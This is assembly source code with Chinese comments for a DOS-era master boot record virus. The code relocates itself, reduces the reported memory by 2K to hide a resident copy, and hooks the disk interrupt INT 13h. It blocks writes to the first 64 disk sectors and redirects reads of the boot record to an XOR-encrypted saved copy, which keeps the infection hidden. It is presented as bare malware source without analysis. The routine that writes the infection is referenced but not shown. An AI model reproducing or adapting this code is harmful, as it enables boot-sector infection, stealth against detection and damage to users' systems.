Main PROC FAR
start:
jmp BeginWrite
begin:
push es
push ds
mov cx,0100h
mov di,0600h
mov ax,0000h
mov ds,ax
mov es,ax
mov si,7c00h
REPNZ MOVSW
mov bx,offset rrr444rr - offset begin + 0600h
jmp bx
rrr444rr:
xor ax,ax
mov ds,ax
push ds
;;;;;;;;;;;;;
mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413
dec ax
dec ax ; 减去2K
mov ds:[413h],ax
MOV CL,06h ;
SHL AX,CL ;ax=9f80h
MOV ES,AX ;算出减2K后病毒本体的位址,计算高端段址(为设置新的INT 13H准备)
;;;;;;;;;;;;;;;
MOV AX,ds:[004Ch] ;取中断向量表中,INT 13H的偏移位置
mov di,0000h
mov word ptr es:[di],ax
MOV AX,ds:[004Eh] ;取INT 13H的段地址
add di,02h
mov word ptr es:[di],ax
;;;;;;;;;;;;;
cli
MOV AX,010h ;将新的INT 13H位置写入中断向量表
MOV word ptr ds:[004Ch],ax
MOV AX,ES
MOV word ptr ds:[004Eh],ax
sti
;;;;;;;;;;;;;;
mov cx,offset NewInt13hCodeEnd - offset NewInt13hCodeBegin
pop ds
mov si,offset NewInt13hCodeBegin - offset begin + 0600h ;
mov di,0010h
repnz movsb ;将这段程序搬到高端
mov bx,offset NewInt13hCodeEnd - offset begin + 0600h
jmp bx
NewInt13hCodeBegin:
push ds
push si
push di
push ax
push cx
push dx
cmp ah,03h
jne NotWriteHarddsik
cmp dh,00h
jne NotWriteHarddsik
cmp cx,40h
jbe NewInt13Exit ;如果是写前64个扇区则退出中断
NotWriteHarddsik:
cmp ah,02h
jne ReadHarddiskNatural
cmp dh,00h
jne ReadHarddiskNatural
cmp cx,001h ;是否是想读原MBR
jne ReadHarddiskNatural
;;;;;;;;;;;;;;;
;读原引导记录
mov cx,01ah ;将加了密的MBR读出来
pushf
call dword ptr cs:[0000h]
;;;;;;;;;;;;; ;将加了密的MBR读出来解密
push di
push cx
push ax
mov di,bx
mov cx,200h
cld
GetRightMBRInfo:
mov al,[di]
xor al,2eh
mov byte ptr [di],al
inc di
loop GetRightMBRInfo
pop ax
pop cx
pop di
;;;;;;;;;;;;;;;;;;;
pop dx
pop cx
pop ax
pop di
pop si
pop ds
retf 0002
ReadHarddiskNatural:
pushf
call dword ptr cs:[0000h]
NewInt13Exit:
pop dx
pop cx
pop ax
pop di
pop si
pop ds
retf 0002
NewInt13hCodeEnd:
pop es
mov ax,201h
mov bx,7c00h
mov cx,001h
mov dx,080h
int 13h
jmp bx